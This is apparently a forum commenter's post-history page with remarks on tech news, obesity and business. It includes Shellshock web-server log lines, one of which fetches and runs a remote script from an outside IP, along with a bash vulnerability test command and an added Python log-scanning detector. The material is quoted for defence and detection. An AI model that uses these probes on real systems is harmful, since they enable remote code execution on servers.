Posts by Jim 59
2047 publicly visible posts • joined 24 Jun 2009
'Theoretical' Nobel economics explain WHY the tech industry's such a damned mess
Ingram UK basks in rosy glow of ... successful cost-cutting
Lies, damn pies and obesity statistics: We're NOT a nation of fatties
Obesity
It's no good blaming others. However fat or slim you are, we all understand the temptation to eat more and more. In 2014 I would be thought of as slim. In 1975 I would have been slightly chubby. But like others, I could eat less food, and better. If you want to see what healthy weight looks like, check out almost any photo taken before 1984-ish.
Neither does it help to tell weighty folks that it is okay to be very, very obese, as some well-meaning TV programmes do, for example. It isn't. Being enormous can lead to a short, uncomfortable and less happy life. It is kinder to (politely) tell people that early on, and help them avoid it. Pretending otherwise is the worst kind of cruelty.
Lights off, nappies on! It's Alien: Isolation and The Evil Within
Women, your 'superpower' is ... NOT asking for a raise: Satya Nadella
Windows 10 feedback: 'Microsoft, please do a deal with Google to use its browser'
Women! Worried you won't get that Job in IT? Mention how hot you are
@Ross K
One of the biggest problems faced by professional engineers is that nobody knows what a professional engineer is, or that professional engineering exists as a thing. The Register knows, and so does everyone in this forum, for obvious reasons.
Chris Mellor's Tuesday is evidently a bit slow, so he popped in here to drop one of the best troll posts I have ever seen. Subtle but explosive, it spread soft and sticky over the faces of more volatile commentards, who sure enough frothed up in a fine "up the workers" bun fight: ...stop talking shite..., etc. etc.
Lol. Chris Mellor for CoTW vulture dropping of greatness or whatever it is.
Revenge smut bullies who send 'grossly offensive' messages WILL be prosecuted
Off topic, but to anyone considering committing their nude selves to electronic storage, especially while performing any kind of "act" or whatever: apply a common sense algorithm. Don't do it.
Electronic pictures and movies can be circulated, copied and broadcast without limit, including accidentally. Revenge is one possibility but there are many others: a computer can be discarded, go to a repair shop, be infected with malware, backed up, an SD card or phone can be lost, forgotten about, stolen, discarded in error. Even if you encrypt, delete or "shred" the pics, copies can still hang around. Don't. Do. It.
Linux systemd dev says open source is 'SICK', kernel community 'awful'
Re: Olivetti and Time Travel
Fair enough. This story is not about an expert raging at a noob but two experts raging at each other. I don't know if there is any justification but many 'tards appear to think that there is, with the systemd man's contributions being more of a nuisance than a help seemingly. True he does it for free, but if you are just interfering in an unwelcome way, the fact that you are doing it for free is by-the-by.
Will we ever can the spam monster?
Re: Anti-spam-iotics
Botnets often start with insecure legacy systems. Eg. Vista and earlier versions of Windows, which were inherently insecure (eg. any user can run any program, any click in email can run any program). As they fade away to be replaced by Windows 7 and later (which successfully copied the Unix "sudo" security model), botnets may fade out, like an amoeba with nowhere to go. Hopefully.
Uni boffins: 'Accurate' Android AV app outperforms most rivals
So long Lotus 1-2-3: IBM ceases support after over 30 years of code
Re: Back in a time where...
ql says: "...we thought that Windows was looking like the future"
One year, about 1985, I attended the Personal Computer World Show at Earl's Court. It was called "Personal..." because it was organized by the magazine of the same name, but it was as much about business computers. We were all used to word processing, databases etc with an 80x25 text screen, and pretty happy with that to be honest. At least it was simple and fast. But at the Show, it was Windowing GUIs on all sides - GEM, Apricot, Apple, Windows, all the big players - and small ones - had something to push. Still monochrome, mind.
Apple blacklists tech journo following explicit BENDY iPhone vid
Windows 10: One for the suits, right Microsoft? Or so one THOUGHT
Third patch brings more admin Shellshock for the battered and Bashed
ARMs head Moonshot bodies: HP pops Applied Micro, TI chips into carts
SHELLSHOCKED: Fortune 1000 outfits Bash out batches of patches
Meanwhile, on a web server that was already patched twice
173.45.100.18 - - [28/Sep/2014:17:27:34 +0100] "GET /cgi-bin/hi HTTP/1.0" 404 491 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
Carson Sweet (excellent name) stop telling everyone that embedded devices like "TVs to soda machines" are vulnerable. They run Busybox Ash, not Bash. Or if you know any that do run bash, say which.
To any poor citizens half way up a ladder clawing their IP cameras off the wall - LEAVE IT. Go check your web servers instead.
WHY did Sunday Mirror stoop to slurping selfies for smut sting?
Mirror
Not exactly Woodward & Bernstein, is it ? Apart from the stuff in the article, this peccadillo would never have happened but for the actions of the Mirror. They have broken a woman's heart, destroyed the bloke and ruined the lives of his 5 children. I wonder if they hacked his phone as well.
Hackers thrash Bash Shellshock bug: World races to cover hole
Re: How to check?
If you are running an internet facing Apache web server, check the logs for strings such as (). Eg. apart from Graham's scan yesterday, one of my servers was probed this morning from an IP address somewhere in the AWS in Thailand:
$ grep \(\) access.log
54.251.83.67 - - [26/Sep/2014:06:10:55 +0100] "GET / HTTP/1.1" 403 466 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
Thanks to El Reg, the system was already patched.
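A fuller version of the log check described in the post above, as an added example that is not part of the original post: it parses Apache combined-format lines and flags any request, Referer or User-Agent value containing the `() {` function-definition prefix. The sample log lines are constructed (documentation IP addresses), and the function and variable names are assumptions.

```python
import re

# One quoted field of an Apache "combined" log line; values may contain \" escapes.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
# host ident user [time] "request" status bytes "referer" "user-agent"
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + QUOTED + r' (\d{3}) \S+ ' + QUOTED + ' ' + QUOTED + r'\s*$'
)
# A bash function definition: "()" then optional whitespace then "{".
PROBE_RE = re.compile(r'\(\)\s*\{')


def find_probes(lines):
    """Return one dict per log line that carries a Shellshock-style probe."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if m is None:
            # Unparseable line: search the raw text rather than skip it silently.
            if PROBE_RE.search(line):
                hits.append({"host": None, "time": None, "status": None, "fields": ["raw"]})
            continue
        host, when, request, status, referer, agent = m.groups()
        fields = [name for name, value in
                  (("request", request), ("referer", referer), ("user-agent", agent))
                  if PROBE_RE.search(value)]
        if fields:
            # The status code is kept so each hit can be triaged against what the server answered.
            hits.append({"host": host, "time": when, "status": int(status), "fields": fields})
    return hits


# Constructed sample input: a probe in the User-Agent, a benign "()" in a URL,
# and a probe in the Referer written without a space before the brace.
SAMPLE_LOG = r'''
192.0.2.10 - - [26/Sep/2014:06:10:55 +0100] "GET / HTTP/1.1" 403 466 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
198.51.100.7 - - [26/Sep/2014:06:11:02 +0100] "GET /api?callback=init() HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.5 - - [26/Sep/2014:06:12:40 +0100] "GET /cgi-bin/status HTTP/1.0" 404 491 "(){ :;}; echo probe" "-"
'''.splitlines()

if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG):
        print(hit["host"], hit["time"], hit["status"], ",".join(hit["fields"]))
```

Matching on `() {` rather than a bare `()` keeps ordinary URLs such as the `callback=init()` query string out of the results.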
Re: Eyes on the code? Not.
Nah. No hacker worth his salt should waste time over this now. He will be better off looking for flaws that are NOT currently being worked on, discussed and updated by a fair chunk of the planet's IT experts. Shellshock's cover is "blown". Thanks partly to The Reg. The black hats may catch a few internet facing Raspberry Pis, but to get a commercial server, they would have to work so fast the typing will give them repetitive strain injury.
This is a result of the "open" approach.
Re: How to check?
Red Hat has released the second Bash patch in as many days. Just installed it here. Now Ormandy's test fails:
$ env X='() { (a)=>\' sh -c "echo date"; cat echo
date
cat: echo: No such file or directory
@Tenable @Register please stop telling everybody that IOT devices are at risk. IOT/embedded devices use Busybox, not Bash, as Tenable must know. If Tenable has discovered any that don't, please say which ones, or point out the Busybox vulnerability if you think there is one. Keep calm and carry on.
Bash bug: Shellshocked yet? You will be ... when this goes WORM
Yes, I pretty much would bet my life on webcams et al not using bash, for sound economic/engineering reasons. Bash is a big, big program and needs a full computing environment to run. The binary alone is over 1 MB, almost twice the size of Busybox. Even a quiescent bash instance takes several MB of memory to run, plus many libraries, plus all the other programs the user will call. Manufacturers use Busybox because it replaces all that. I have never seen an embedded device that had standalone Bash. Big NAS boxes conceivably, but I have never seen it.
The bigger danger is web servers. I saw Graham's shellshock scan at 8:20 this morning in my logs, and patched the server an hour ago. And devices like Raspberry Pi's where the user has it internet facing for
Bigger items
On the other hand, internet facing NAS devices might
systems would be out of business.
To run it, the IP webcam would have to be running a full linux kernel/environment and have
Graham's blog says many "internet of things" devices will be vulnerable and will remain so because they can't be patched. They may be vulnerable, but not to this bug. As 'tards have pointed out, IP cameras etc. aren't equipped with Bash, why would they be ? Embedded stuff, even more substantial items like NAS boxes and routers, come with Busybox only.
Also. Errr. Isn't Graham breaking the law in rather an extravagant way by blithely scanning thousands of organizations ? Notwithstanding his good intentions.
BT claims almost-gigabit connections over COPPER WIRE
Of course, the other group of people who love copper are thieves, who love nothing more than nicking cables to sell off to dodgy metal traders. Earlier this year, BT suffered a nationwide outage after thieves severed the telecoms giant's fibre cable in an effort to nick copper wiring.
Metal thefts in the UK have dropped 95% in the last year, since the licenses were introduced for scrap metal dealers, and cash transactions outlawed.
Are you a fat boy? Get to university now, you penniless slacker
Correlation is not causation
The test results highlight a correlation, but do not explain causes. So the paragraph beginning thus:
What’s actually happening is that the boys end up with lower cognitive skills and crushed motivation,...
...has no basis. At least no basis in the test results. It is pure editorial by Team Register, based on their own world view and opinion. Just sayin'.
Phones 4u demise: 1,700 employees laid off with redundo package
What fee did PwC earn from the caper ? Who recommended administration ? What part was played by BC Partners ? Did they really just buy Phones 4u, drain it of 200m and collapse the company ? How could a dividend be paid if the company was not in profit ? What prompted 4u to seek a loan ? Why would they do so if they were in profit ? All of this will be answered in the pages of Private Eye over the next 6 months.
Shades of Phoenix/Rover here ?
Apple iPhone 6: Looking good, slim. AW... your battery died
Relive the death of Earth over and over again in Extinction Game
SanDisk Extreme Pro SSD – courting speed freaks and gamers
EE buys 58 Phones 4u stores for £2.5m after picking over carcass
Top Gear Tigers and Bingo Boilers: Farewell then, Phones4U
I regard car salesmen as lazy, greasy, foul-smelling mobile dandruff dispensers.
Really ? I have found them to be friendly, efficient, usually well dressed and presented.
When 'tards complain of "sales droids" they are really complaining about the company saving money by employing people as young as possible, paying them as little as possible and offering no training.
Got your NUDE SELFIES in the cloud? Two-factor auth's your best bet for securing them
Hate Facebook? Hate it enough to spend $9k fleeing it? Web 'country club' built for the rich
Interesting story. If you want to become super-rich, don't buy shares in this site. Like all of us, the super-rich want to interact with their peers, I guess. But they have places to do that. If you were a billionaire, working 1 or 2 days a week, you might invite a few other billionaires on your yacht for fishing in St Tropez or wherever, then jet off to see how your Scottish estate is doing. You won't be short of friends, that's for sure.
'Windows 9' LEAK: Microsoft's playing catchup with Linux
Re: Meeeh
I sort of take h4rm0ny's point about people preferring to stick with what they know and react badly against what is new. But it isn't really like that with computers and GUIs. Users really do like good stuff, and dislike bad stuff. They are excellent judges, which is a main plank of Apple's success. Give them something nice and they like it straightaway.
I still remember how delighted the public was with the Windows 95 GUI, and how it was such an improvement over 3.1. We immediately loved the shiny new right-click context menus, and the start button menu. I never heard a single voice want to go back to 3.1.
Re: Meeeh
As Reg editors well know or could have found with one Google search, almost every windowing system ever written has had multiple desktops. Either built in or with a bit of freeware. Remember Bigdesk on Windows 3.1 ? In fact, multiple desktops were more heavily used then due to the low resolutions in use.